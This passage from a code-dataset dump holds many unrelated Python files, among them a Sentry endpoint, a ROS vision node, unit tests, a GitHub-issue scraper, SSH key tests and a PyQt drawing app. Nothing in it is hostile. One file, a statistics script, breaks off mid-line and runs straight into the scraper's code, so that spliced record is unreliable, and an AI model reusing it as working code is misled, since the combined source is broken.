Counter()\n]","sub_path":"pratice_xueqiu_mock/mock_map_local/xueqiu_mock_map_local.py","file_name":"xueqiu_mock_map_local.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593282338","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/src/sentry/src/sentry/api/endpoints/relay_projectconfigs.py\n# Compiled at: 2019-08-16 17:27:45\nfrom __future__ import absolute_import\nimport six\nfrom rest_framework.response import Response\nfrom sentry.api.base import Endpoint\nfrom sentry.api.permissions import RelayPermission\nfrom sentry.api.authentication import RelayAuthentication\nfrom sentry.relay import config\nfrom sentry.models import Project, Organization\n\nclass RelayProjectConfigsEndpoint(Endpoint):\n authentication_classes = (\n RelayAuthentication,)\n permission_classes = (RelayPermission,)\n\n def post(self, request):\n relay = request.relay\n assert relay is not None\n full_config_requested = request.relay_request_data.get('fullConfig')\n if full_config_requested and not relay.is_internal:\n return Response('Relay unauthorized for full config information', 403)\n else:\n project_ids = request.relay_request_data.get('projects') or ()\n projects = {}\n orgs = set()\n if project_ids:\n for project in Project.objects.filter(pk__in=project_ids):\n proj_config = config.get_project_config(project.id, relay.is_internal and full_config_requested)\n projects[six.text_type(project.id)] = proj_config\n orgs.add(project.organization_id)\n\n if orgs:\n orgs = {o.id:o for o in Organization.objects.filter(pk__in=orgs)}\n for cfg in list(projects.values()):\n org = orgs.get(cfg.project.organization_id)\n if org is None or not request.relay.has_org_access(org):\n projects.pop(six.text_type(cfg.project.id))\n\n configs = {p_id:cfg.to_camel_case_dict() for p_id, cfg in six.iteritems(projects)}\n for project_id in project_ids:\n configs.setdefault(six.text_type(project_id), None)\n\n return Response({'configs': configs}, status=200)","sub_path":"pycfiles/sentry-10.0.0-py27-none-any/relay_projectconfigs.py","file_name":"relay_projectconfigs.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"335900523","text":"#!/usr/bin/env python3\n\nimport roslib\nimport sys\nimport rospy\nimport cv2\nimport numpy as np\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float64MultiArray, Float64\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom ivr_vision import ivr_vision, camera\nfrom Link1Estimator import Link1Estimator\nfrom forward_kinematics import robot\nfrom sensor_msgs.msg import JointState\nfrom copy import copy\nimport matplotlib.pyplot as plt\n\nclass image_converter:\n def __init__(self):\n self.test()\n rospy.init_node('image_processing', anonymous=True)\n self.image_pub1 = rospy.Publisher(\"image_topic1\",Image, queue_size = 1)\n self.bridge = CvBridge()\n self._cam2_joint_locations_2d = np.repeat(None, 2 * 4).reshape(4, -1)\n self._joint_locations_2d = np.repeat(None, 2 * 4).reshape(4, -1)\n self._prev_angles = None\n self._joint_angles = np.array([0.0, 0.0, 0.0, 0.0])\n # comms\n self.image_sub1 = rospy.Subscriber(\"/camera1/robot/image_raw\",Image,self.callback1)\n self.joint1_controller = rospy.Publisher(\"/robot/joint1_position_controller/command\", Float64, queue_size=3)\n self.joint2_controller = rospy.Publisher(\"/robot/joint2_position_controller/command\", Float64, queue_size=3)\n self.joint3_controller = rospy.Publisher(\"/robot/joint3_position_controller/command\", Float64, queue_size=3)\n self.joint4_controller = rospy.Publisher(\"/robot/joint4_position_controller/command\", Float64, queue_size=3)\n self.joint_angles_pub = rospy.Publisher(\"/robot/all_joints_estimate\", Float64MultiArray, queue_size=3)\n self.cam2_joint1_location_2d_sub = rospy.Subscriber(\"/camera2/joint1_location_2d\",Float64MultiArray,self.joint_locations_callback1)\n self.cam2_joint2_location_2d_sub = rospy.Subscriber(\"/camera2/joint2_location_2d\",Float64MultiArray,self.joint_locations_callback2)\n self.cam2_joint3_location_2d_sub = rospy.Subscriber(\"/camera2/joint3_location_2d\",Float64MultiArray,self.joint_locations_callback3)\n self.cam2_joint4_location_2d_sub = rospy.Subscriber(\"/camera2/joint4_location_2d\",Float64MultiArray,self.joint_locations_callback4)\n\n def test(self):\n X = np.array([\n [[0, 0, 0], [0, 0, 2.5], [0, 0, 6] , [0, 0, 9]],\n [[0, 0, 0], [0, 0, 2.5], [0, 3.5, 2.5] , [0, 6, 2.5]],\n [[0, 0, 0], [0, 0, 2.5], [-1.75, -1.52, 5.12], [-2.81, -0.60, 7.78]],\n [[0, 0, 0], [0, 0, 2.5], [-2.31, .166, 5.13] , [-2.41, 1.56, 7.78]]\n ])\n Y = np.array([\n [0, 0, 0, 0],\n [0, 0, np.pi / 2, 0],\n [0 , np.pi / 6, -np.pi / 6, -np.pi / 4],\n [-np.pi / 4, np.pi / 6, -np.pi / 6, -np.pi / 4]\n ])\n errors = []\n predictions = []\n prev_estimate = -np.pi\n for theta1_truth in np.linspace(-np.pi, np.pi, num=30):\n angles = np.array([theta1_truth, np.pi / 6, -np.pi / 6, -np.pi / 4])\n # angles = np.array([theta1_truth, 0, 0, 1.3])\n _mat_1 = ivr_vision._transform(theta=np.pi/2, a=0.0, d=2.5, alpha=np.pi/2 , angle=angles[0])\n _mat_2 = ivr_vision._transform(theta=np.pi/2, a=0.0, d=0.0, alpha=np.pi/2 , angle=angles[1])\n _mat_3 = ivr_vision._transform(theta=0.0 , a=3.5, d=0.0, alpha=-np.pi/2, angle=angles[2])\n _mat_4 = ivr_vision._transform(theta=0.0 , a=3.0, d=0.0, alpha=0.0 , angle=angles[3])\n fk_joint_locs = np.array([\n [0.0, 0.0, 0.0],\n (_mat_1)[:-1, -1],\n (_mat_1 @ _mat_2 @ _mat_3)[:-1, -1],\n (_mat_1 @ _mat_2 @ _mat_3 @ _mat_4)[:-1, -1]\n ])\n estimated_angles, error = ivr_vision.fit_theta1(fk_joint_locs, prev_estimate)\n predictions.append([theta1_truth, estimated_angles[0]])\n errors.append([theta1_truth, error])\n prev_estimate = estimated_angles[0]\n predictions = np.array(predictions)\n errors = np.array(errors)\n plt.plot(predictions[:,0], predictions[:,1], c='gray')\n plt.xlabel(r'$\\theta_1$')\n plt.xticks([-np.pi, np.pi], [r'$-\\pi$', r'$\\pi$'])\n plt.ylabel(r'$\\hat{\\theta_1}$')\n plt.yticks([-np.pi, np.pi], [r'$-\\pi$', r'$\\pi$'])\n plt.title(r'$\\hat{\\theta_1}$ as a function of $\\theta_1$')\n plt.show()\n\n def joint_locations_callback1(self, data):\n self._cam2_joint_locations_2d[0] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def joint_locations_callback2(self, data):\n self._cam2_joint_locations_2d[1] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def joint_locations_callback3(self, data):\n self._cam2_joint_locations_2d[2] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def joint_locations_callback4(self, data):\n self._cam2_joint_locations_2d[3] = np.array(data.data)\n self._joint_locations_callback(data)\n\n def _joint_locations_callback(self, data):\n if self._joint_locations_2d is None or None in self._cam2_joint_locations_2d:\n return\n Js = ivr_vision.combine_joint_locations(self._joint_locations_2d, self._cam2_joint_locations_2d)\n\n self._joint_angles, error = ivr_vision.fit_theta1(Js, self._joint_angles[0])\n\n self.joint_angles_pub.publish(Float64MultiArray(data=self._joint_angles))\n if (self._prev_angles is None or np.linalg.norm(self._prev_angles - self._joint_angles) > 0.2):\n print(f'angles: {self._joint_angles}')\n self._prev_angles = self._joint_angles\n\n def callback1(self,data):\n try:\n self.cv_image1 = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n ivr_vision.update_joint_locations(self.cv_image1, self._joint_locations_2d)\n im1=cv2.imshow('window1', self.cv_image1)\n cv2.waitKey(1)\n try:\n self.image_pub1.publish(self.bridge.cv2_to_imgmsg(self.cv_image1, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n\n time = rospy.get_time()\n # self._update_joint1(time)\n # self._update_joint2(time)\n # self._update_joint3(time)\n # self._update_joint4(time)\n\n def _update_joint1(self, t):\n new_state = np.pi * np.sin(np.pi / 15.0 * t)\n self.joint1_controller.publish(new_state)\n\n def _update_joint2(self, t):\n new_state = np.pi / 2.0 * np.sin(np.pi / 15.0 * t)\n self.joint2_controller.publish(new_state)\n\n def _update_joint3(self, t):\n new_state = np.pi / 2.0 * np.sin(np.pi / 18.0 * t)\n self.joint3_controller.publish(new_state)\n\n def _update_joint4(self, t):\n new_state = np.pi / 2.0 * np.sin(np.pi / 20.0 * t)\n self.joint4_controller.publish(new_state)\n\ndef main(args):\n ic = image_converter()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"src/task_4_1.py","file_name":"task_4_1.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637290954","text":"# -*- coding:utf-8 -*-\n'''\n#文件名:\n#作者:张利娟\n#创建日期:2018/1/17\n#模块描述:\n#历史修改记录\n#修改人:\n#修改日期:\n#修改内容:\n'''\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n# 导入驱动\nsys.path.append(\"/testIsomp/common/\")\nfrom _initDriver import initDriver\nsys.path.append(\"/testIsomp/testCase/mount/\")\nfrom test_mount import testMount\nsys.path.append(\"/testIsomp/testSuite/common_suite_file/\")\nfrom common_suite_file import setDriver, CommonSuiteData\nimport unittest\n\nclass testMountSuit(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.browser = setDriver().set_driver()\n\t\tself.comsuit = CommonSuiteData(self.browser)\n\t\tself.testmount = testMount(self.browser)\n\n\t\t#前置条件\n\t\tself.comsuit.audit_mount_module_prefix_condition()\n\n\tdef test_audit_mount(self):\n\t\t#添加审计存储扩展\n\t\tself.testmount.add_mount_001()\n\t\t#审计存储扩展校验\n\t\tself.testmount.check_mount_002()\n\n\t#后置条件\n\tdef tearDown(self):\n\t\tself.comsuit.audit_mount_module_post_condition()\n\t\tinitDriver().close_driver(self.browser)\n\nif __name__ == \"__main__\":\n\tunittest.main()\n\n","sub_path":"testSuite/test_027_audit_mount_suit.py","file_name":"test_027_audit_mount_suit.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"71881143","text":"'''\nCreated on 17/04/2014\n\n:author: alfred\n'''\nimport os\nimport json\nfrom uuid import uuid4\nfrom unittest.case import TestCase\nfrom tests import BaseTestCase, mock_session_org_type\n\n\nclass DeviceGroupViewTest(BaseTestCase, TestCase):\n\n @mock_session_org_type('customer')\n def test_list(self):\n response = self.client.get(\"/dmm/c23456789012345678901234/device-group\")\n self.assert200(response)\n\n data = response.json\n\n self.assertEqual(len(data), 1, str(data))\n self.assertTrue('deviceGroups' in data, \"deviceGroups key in \" + str(data))\n sc = data['deviceGroups']\n self.assertEqual(len(sc), 2, str(sc))\n self.assertTrue('items' in sc, \"items key in \" + str(sc))\n self.assertTrue('count' in sc, \"count key in \" + str(sc))\n\n @mock_session_org_type('customer')\n def test_list_with_watchers(self):\n response = self.client.get(\"/dmm/c23456789012345678901234/device-group?_watchers=1\")\n self.assert200(response)\n\n data = response.json\n\n self.assertEqual(len(data), 2, str(data))\n self.assertTrue('deviceGroups' in data, \"deviceGroups key in \" + str(data))\n sc = data['deviceGroups']\n self.assertEqual(len(sc), 2, str(sc))\n self.assertTrue('items' in sc, \"items key in \" + str(sc))\n self.assertTrue('count' in sc, \"count key in \" + str(sc))\n\n self.assertTrue('watchers' in data, \"watchers key in \" + str(data))\n sc = data['watchers']\n self.assertEqual(len(sc), 2, str(sc))\n self.assertTrue('items' in sc, \"items key in \" + str(sc))\n self.assertTrue('count' in sc, \"count key in \" + str(sc))\n\n @mock_session_org_type('customer')\n def test_create_upload_not_found(self):\n response = self.client.post(\"/dmm/c23456789012345678901234/device-group/\",\n data='{\"name\": \"foobar\", \"uploadId\": \"222323232323232323\"}')\n self.assert400(response)\n\n data = response.json\n\n self.assertEqual(data, {'message': 'Model does not pass validations',\n 'exception': {\n 'class': 'ValidateError',\n 'code': '400',\n 'message': 'Model does not pass validations'\n },\n 'error': '400',\n 'validationErrors':\n {'uploadId': {'notFound': \"Item '222323232323232323' not found\"}}},\n str(data))\n\n @mock_session_org_type('customer')\n def test_create_upload(self):\n response = self.client.post(\"/core/upload/\")\n self.assert200(response)\n\n data = response.json\n\n self.assertEqual(len(data), 1, str(data))\n\n self.assertTrue('upload' in data, \"upload key in \" + str(data))\n data = data['upload']\n\n self.assertTrue('id' in data, \"id key in \" + str(data))\n\n id = data['id']\n\n filename = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n 'data', 'test_1.csv')\n\n with open(filename, 'rb') as test_file:\n response = self.client.post(\"/core/upload/{}\".format(id), buffered=True,\n content_type='multipart/form-data',\n data={'data': '',\n 'file_field': test_file})\n self.assert200(response)\n\n data = {'name': str(uuid4())[:32],\n 'uploadId': id}\n\n response = self.client.post(\"/dmm/c23456789012345678901234/device-group/\",\n data=json.dumps(data))\n self.assert200(response)\n\n data = response.json\n\n self.assertIn('id', data, str(data))\n self.assertIn('watcher', data, str(data))\n","sub_path":"mc-pybe-release-smip-R4/tests/blueprints/dmm/device_group/tests_views.py","file_name":"tests_views.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494501906","text":"import numpy as np\r\nfrom statsmodels.formula.api import ols\r\nfrom statsmodels.stats.anova import anova_lm\r\nimport pandas as pd\r\nfrom scipy.interpolate import pchip_interpolate\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.manifold import TSNE\r\nimport scipy.io as sio\r\nmatplotlib.use('Agg')\r\nMODE_LIST = ['min-rpe','max-rpe','min-spe','max-spe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\nMODE_MAP = {\r\n 'min-spe' : ['spe', None, 'red', 'MIN_SPE'],\r\n 'max-spe' : ['spe', None, 'mediumseagreen', 'MAX_SPE'],\r\n 'min-rpe' : ['rpe', None, 'royalblue', 'MIN_RPE'],\r\n 'max-rpe' : ['rpe', None, 'plum', 'MAX_RPE'],\r\n 'min-rpe-min-spe' : ['spe', 'rpe', 'tomato', 'MIN_RPE_MIN_SPE'],\r\n 'max-rpe-max-spe' : ['spe', 'rpe', 'dodgerblue', 'MAX_RPE_MAX_SPE'],\r\n 'max-rpe-min-spe' : ['spe', 'rpe', 'y', 'MAX_RPE_MIN_SPE'],\r\n 'min-rpe-max-spe' : ['spe', 'rpe', 'mediumvioletred', 'MIN_RPE_MAX_SPE']\r\n}\r\nVAR_MAP_LIST = ['PMB','SPE', 'RPE','RWD','SCR']\r\nfolderpath = '20210827'\r\nfile_suffix = '_2020_20_trials_delta_control_highest'\r\nmax_sbj = 82\r\n#file_suffix = '_2020_delta_trials_control_highest'\r\n#file_suffix = '_2019_delta_trials_control_highest'\r\n# if file_suffix == '_2020_delta_trials_control' or file_suffix == '_2020_20_trials_delta_control_highest':\r\n# MODE_LIST = ['min-rpe', 'max-rpe']\r\nmode_idf = 2 #2-min 3-max\r\ndo_anova = False\r\nvar_idf = 0\r\nCONTROL_resting = 99\r\n\r\nFBA=np.load('FBA.npy')\r\nFBA_lb = np.zeros(max_sbj)\r\nfor ii in range(max_sbj):\r\n #if FBA[ii] div > div > a')\n\t\tb=soup.select('span.opened-by')\n\t\tc=soup.select('relative-time')\n\t\ttest=soup.select('div.float-left.col-9.lh-condensed.p-2')\n\t\t#hostsfile = open('record.txt', 'w', newline='',encoding='UTF-8')\n\t\tfor i in range(0,len(b)):\n\t\t\ttemp=[]\n\t\t\ttemp.append(a[i].get_text()) #标题\n\t\t\ttemp.append(\"closed\") #状态\n\t\t\ttemp.append(c[i].attrs['datetime']) #问题提出时间\n\t\t\tz=\"\"\n\t\t\tfor j in test[i].select('a.d-inline-block.IssueLabel.v-align-text-top'):\n\t\t\t\tz+=j.get_text()+'/'\n\t\t\ttemp.append(z) #标签\n\t\t\t#sn=b[i].get_text().replace(\" \",\"\").split('\\n')[1].replace(\"#\",\"\").replace(\"\\n\",\"\")\n\t\t\tm = re.search('\\d+',b[i].get_text())\n\t\t\tn=m.group(0)\n\t\t\ttemp.append(m.group(0)) #任务ID\n\t\t\ts,t=getdata(m.group(0))\n\t\t\t#s=getdata(m.group(0))\n\t\t\ttemp.append(t) #任务关闭时间\n\t\t\tfor i in s:\n\t\t\t\ttemp.append(i)\n\t\t\t#temp.append(s)\n\t\t\twrite07Excel(\"closed.xlsx\",temp)\n\t\t\t#record.append(temp)\n\t\t#hostsfile.close()\n\t\tprint('hosts刷新成功:',len(a))\n\texcept Exception as err:\n\t\tprint(str(err))\n\ndef getdata(sn):\n\ttemp=[]\n\ttry:\n\t\turl=\"https://github.com/tensorflow/tensorflow/issues/\"+str(sn)\n\t\tdata = urllib.request.urlopen(url).read()\n\t\tz_data = data.decode('UTF-8')\n\t\tsoup = BeautifulSoup(z_data, 'lxml')\n\t\ta = soup.select('task-lists table > tbody > tr > td.d-block.comment-body.markdown-body.js-comment-body')\n\t\tb = soup.select('div.discussion-item.discussion-item-closed')\n\t\tauthor=soup.find_all('h3',attrs={'class':'timeline-comment-header-text f5 text-normal'})\n\t\t#print(sn,len(a),len(author))\n\t\ttemp.append(len(a)-1) #评论数\n\t\ttemp.append(author[0].select('a.author')[0].get_text()) #问题提出者\n\t\tif len(b[0].select('a.author'))>0:\n\t\t\ttemp.append(b[0].select('a.author')[0].get_text()) #问题关闭者\n\t\telse:\n\t\t\ttemp.append(\"\")\n\t\ttemp.append(a[0].get_text())\n\t\tfor i in range(1,len(a)):\n\t\t\ttempd=[]\n\t\t\ttempd.append(sn) #问题id\n\t\t\ttempd.append(author[i].select('a.author')[0].get_text()) #评论人id\n\t\t\ttempd.append(author[i].select('relative-time')[0].attrs['datetime']) #评论时间\n\t\t\ttempd.append(a[i].get_text()) #评论内容 #评论内容\n\t\t\twrite07Excel(\"closed_comment.xlsx\",tempd)\n\texcept Exception as err:\n\t\tprint(str(err))\n\t\t#pass\n\tif len(b[0].select('relative-time'))>0:\n\t\treturn temp,b[0].select('relative-time')[0].attrs['datetime']\n\telse:\n\t\treturn temp,\"\"\n\n'''\ndef write07Excel(path,value,row):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'Sheet1'\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i+1, column=j+1, value=str(value[i][j]))\n wb.save(path)\n'''\n\nif __name__==\"__main__\":\n\t#for i in range(37,146):\n\ttry:\n\t\tgettitle(float(P))\n\t\tprint(\"第\"+str(P)+\"页完成\")\n\texcept Exception as err:\n\t\thostsfile = open('comments.txt', 'w', newline='')\n\t\thostsfile.write(str(P)+\":\"+str(err) + \"\\n\")\n\t\thostsfile.close()\n\t\t\t#print(\"第\"+str(i)+\"页抓取失败\")\n\t#write07Excel(\"closed.xlsx\",record)","sub_path":"CrawlComments/closed.py","file_name":"closed.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"567978455","text":"from pandas import DataFrame\n\nfrom weaverbird.backends.pandas_executor.steps.cumsum import execute_cumsum\nfrom weaverbird.pipeline.steps import CumSumStep\n\n\ndef test_benchmark_cumsum(benchmark):\n big_df = DataFrame({'value': list(range(1000))})\n step = CumSumStep(\n name='cumsum',\n referenceColumn='value',\n valueColumn='value',\n newColumn='my_cumsum',\n )\n benchmark(execute_cumsum, step, big_df)\n","sub_path":"server/tests/steps/test_cumsum.py","file_name":"test_cumsum.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166680528","text":"import unittest\nfrom unittest.mock import patch, mock_open, MagicMock, call\n\nfrom hypothesis import given, example\nfrom hypothesis.strategies import text, integers, sampled_from\n\nfrom aws_gate.constants import DEFAULT_GATE_KEY_PATH\nfrom aws_gate.ssh_common import SshKey, SUPPORTED_KEY_TYPES, KEY_MIN_SIZE, SshKeyUploader\n\n\nclass TestSSHCommon(unittest.TestCase):\n def setUp(self):\n self.ssh_key = MagicMock()\n self.ssh_key.configure_mock(**{\n 'public_key.return_value': 'ssh-rsa ranodombase64string'\n })\n\n @given(sampled_from(SUPPORTED_KEY_TYPES), integers(min_value=KEY_MIN_SIZE))\n def test_initialize_key(self, key_type, key_size):\n key = SshKey(key_type=key_type)\n\n self.assertTrue(key.key_path, DEFAULT_GATE_KEY_PATH)\n self.assertTrue(key.key_type, key_type)\n self.assertTrue(key.key_size, key_size)\n\n @given(sampled_from(SUPPORTED_KEY_TYPES))\n def test_ssh_public_key(self, key_type):\n key = SshKey(key_type=key_type)\n key.generate()\n\n if key_type == 'rsa':\n key_start_str = 'ssh-rsa'\n else:\n key_start_str = 'ssh-ed25519'\n\n self.assertTrue(key.public_key.decode().startswith(key_start_str))\n\n @given(text())\n def test_initialize_key_unsupported_key_type(self, key_type):\n with self.assertRaises(ValueError):\n SshKey(key_type=key_type)\n\n @given(integers(max_value=KEY_MIN_SIZE))\n @example(0)\n @example(-1024)\n def test_initialize_key_unsupported_key_size(self, key_size):\n with self.assertRaises(ValueError):\n SshKey(key_size=key_size)\n\n def test_initialize_key_invalid_key_path(self):\n with self.assertRaises(ValueError):\n SshKey(key_path='')\n\n @given(sampled_from(SUPPORTED_KEY_TYPES))\n def test_initialize_key_as_context_manager(self, key_type):\n with patch('builtins.open', new_callable=mock_open()) as open_mock, \\\n patch('aws_gate.ssh_common.os'):\n with SshKey(key_type=key_type):\n self.assertTrue(open_mock.called)\n open_mock.assert_called_with(DEFAULT_GATE_KEY_PATH, 'wb')\n\n def test_ssh_key_file_permissions(self):\n with patch('builtins.open', new_callable=mock_open()), \\\n patch('aws_gate.ssh_common.os.chmod') as m:\n key = SshKey()\n key.generate()\n key.write_to_file()\n\n self.assertTrue(m.called)\n self.assertEqual(call(DEFAULT_GATE_KEY_PATH, 0o600), m.call_args)\n\n def test_delete_key(self):\n with patch('builtins.open', new_callable=mock_open()), \\\n patch('aws_gate.ssh_common.os', new_callable=MagicMock()) as m:\n key = SshKey()\n key.generate()\n key.write_to_file()\n key.delete()\n\n self.assertTrue(m.remove.called)\n self.assertEqual(m.remove.call_args, call(DEFAULT_GATE_KEY_PATH))\n\n def test_uploader(self):\n ec2_ic_mock = MagicMock()\n\n uploader = SshKeyUploader(instance_id='i-1234567890', az='eu-west-1a', ssh_key=self.ssh_key, ec2_ic=ec2_ic_mock)\n uploader.upload()\n\n self.assertTrue(ec2_ic_mock.send_ssh_public_key.called)\n\n def test_uploader_as_context_manager(self):\n ec2_ic_mock = MagicMock()\n with SshKeyUploader(instance_id='i-1234567890', az='eu-west-1a', ssh_key=self.ssh_key, ec2_ic=ec2_ic_mock):\n self.assertTrue(ec2_ic_mock.send_ssh_public_key.called)\n\n def test_uploader_exception(self):\n ec2_ic_mock = MagicMock()\n ec2_ic_mock.configure_mock(**{'send_ssh_public_key.return_value': {'Success': False, 'RequestId': '12345'}})\n\n uploader = SshKeyUploader(instance_id='i-1234567890', az='eu-west-1a', ssh_key=self.ssh_key,\n ec2_ic=ec2_ic_mock)\n with self.assertRaises((ValueError)):\n uploader.upload()\n","sub_path":"test/unit/test_ssh_common.py","file_name":"test_ssh_common.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243149730","text":"#!/usr/bin/env python3\n\nfrom analyzer.uninit import UninitSearch\nfrom analyzer.condition import ConditionAnalyzer\nfrom utils import *\n\n__author__ = 'vildhet'\n\n\nclass Analyzer(object):\n def __init__(self, tree, cpp_file):\n self.tree = tree\n self.cpp_file = cpp_file\n\n def find(self):\n for func in self.tree.functions:\n print_green_line('Function ' + func.name + ':')\n uninit = UninitSearch(func)\n warnings = uninit.find()\n for warn in warnings:\n print(warn.text, \"main.cpp:\", warn.line)\n\n cond = ConditionAnalyzer(func)\n warnings = cond.find()\n for warn in warnings:\n print(warn.text, \"main.cpp:\", warn.line)\n\n","sub_path":"analyzer/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"99947180","text":"from PyQt5.Qt import QWidget, QColor, QPixmap, QIcon, QSize, QCheckBox\nfrom PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QPushButton, QSplitter,\\\n QComboBox, QLabel, QSpinBox, QFileDialog\nfrom PaintBoard import PaintBoard\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\nimport recognition\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nclass MainWidget(QWidget):\n\n\n def __init__(self, Parent=None):\n '''\n Constructor\n '''\n super().__init__(Parent)\n \n self.__InitData() #先初始化数据,再初始化界面\n self.__InitView()\n \n def __InitData(self):\n '''\n 初始化成员变量\n '''\n self.__paintBoard = PaintBoard(self)\n self.__colorList = QColor.colorNames() #获取颜色列表(字符串类型)\n \n def __InitView(self):\n '''\n 初始化界面\n '''\n self.setFixedSize(640,480)\n self.setWindowTitle(\"PaintBoard Example PyQt5\")\n \n \n main_layout = QHBoxLayout(self) #新建一个水平布局作为本窗体的主布局\n main_layout.setSpacing(10) #设置主布局内边距以及控件间距为10px\n \n \n main_layout.addWidget(self.__paintBoard) #在主界面左侧放置画板\n \n sub_layout = QVBoxLayout() #新建垂直子布局用于放置按键\n sub_layout.setContentsMargins(10, 10, 10, 10) #设置此子布局和内部控件的间距为10px\n\n self.__btn_Clear = QPushButton(\"清空画板\")\n self.__btn_Clear.setParent(self) #设置父对象为本界面\n self.__btn_Clear.clicked.connect(self.__paintBoard.Clear) #将按键按下信号与画板清空函数相关联\n sub_layout.addWidget(self.__btn_Clear)\n\n self.__label_digit = QLabel(self)\n self.__label_digit.resize(100,30)\n self.__label_digit.setAlignment(Qt.AlignHCenter|Qt.AlignVCenter)\n # label1.setAutoFillBackground(True)\n # self.__btn_Quit = QPushButton(\"退出\")\n # self.__btn_Quit.setParent(self) #设置父对象为本界面\n # self.__btn_Quit.clicked.connect(self.Quit)\n sub_layout.addWidget(self.__label_digit)\n \n self.__btn_Save = QPushButton(\"开始识别\")\n self.__btn_Save.setParent(self)\n self.__btn_Save.clicked.connect(self.on_btn_Save_Clicked)\n sub_layout.addWidget(self.__btn_Save)\n \n self.__cbtn_Eraser = QCheckBox(\" 使用橡皮擦\")\n self.__cbtn_Eraser.setParent(self)\n self.__cbtn_Eraser.clicked.connect(self.on_cbtn_Eraser_clicked)\n sub_layout.addWidget(self.__cbtn_Eraser)\n \n splitter = QSplitter(self) #占位符\n sub_layout.addWidget(splitter)\n \n self.__label_penThickness = QLabel(self)\n self.__label_penThickness.setText(\"画笔粗细\")\n self.__label_penThickness.setFixedHeight(20)\n sub_layout.addWidget(self.__label_penThickness)\n \n self.__spinBox_penThickness = QSpinBox(self)\n self.__spinBox_penThickness.setMaximum(20)\n self.__spinBox_penThickness.setMinimum(2)\n self.__spinBox_penThickness.setValue(10) #默认粗细为10\n self.__spinBox_penThickness.setSingleStep(2) #最小变化值为1\n self.__spinBox_penThickness.valueChanged.connect(self.on_PenThicknessChange)#关联spinBox值变化信号和函数on_PenThicknessChange\n sub_layout.addWidget(self.__spinBox_penThickness)\n\n main_layout.addLayout(sub_layout) #将子布局加入主布局\n\n\n def on_PenThicknessChange(self):\n penThickness = self.__spinBox_penThickness.value()\n self.__paintBoard.ChangePenThickness(penThickness)\n \n def on_btn_Save_Clicked(self):\n # savePath = QFileDialog.getSaveFileName(self, 'Save Your Paint', '.\\\\', '*.png')\n # print(savePath)\n # if savePath[0] == \"\":\n # print(\"Save cancel\")\n # return\n image = self.__paintBoard.GetContentAsQImage()\n image.save(\"data/digit.png\")\n t = recognition.recognition()\n self.digit = t.output()\n font = QtGui.QFont()\n # 字体\n font.setFamily('微软雅黑')\n # 加粗\n font.setBold(True)\n # 大小\n font.setPointSize(30)\n font.setWeight(75)\n self.__label_digit.setFont(font)\n self.__label_digit.setText(\"%s\" % ('#7EC7FF', str(self.digit)))\n #self.__label_digit.setText(self.digit)\n def on_cbtn_Eraser_clicked(self):\n if self.__cbtn_Eraser.isChecked():\n self.__paintBoard.EraserMode = True #进入橡皮擦模式\n else:\n self.__paintBoard.EraserMode = False #退出橡皮擦模式\n \n \n def Quit(self):\n self.close()\n \n \n \n \n \n","sub_path":"MainWidget.py","file_name":"MainWidget.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"371935488","text":"import turtle\nt=turtle.Pen()\n#\ndef triangle(length=100):\n for i in range(3):\n t.forward(length)\n t.right(120)\n#\ndef square(length=100):\n for i in range(4):\n t.forward(length)\n t.right(90)\n# to draw the house dooe\ndef rectangle(length=100):\n t.forward(length)\n t.right(90)\n t.forward(length/2)\n t.right(90)\n t.forward(length)\n t.right(90)\n t.forward(length/2)\n t.right(90)\n# position on screen so can draw on all of it\nt.penup()\nt.backward(300)\nt.pendown()\n# how big is the house\nsize=150\n# outside house squre\nt.left(90)\nsquare(size)\n# window 1 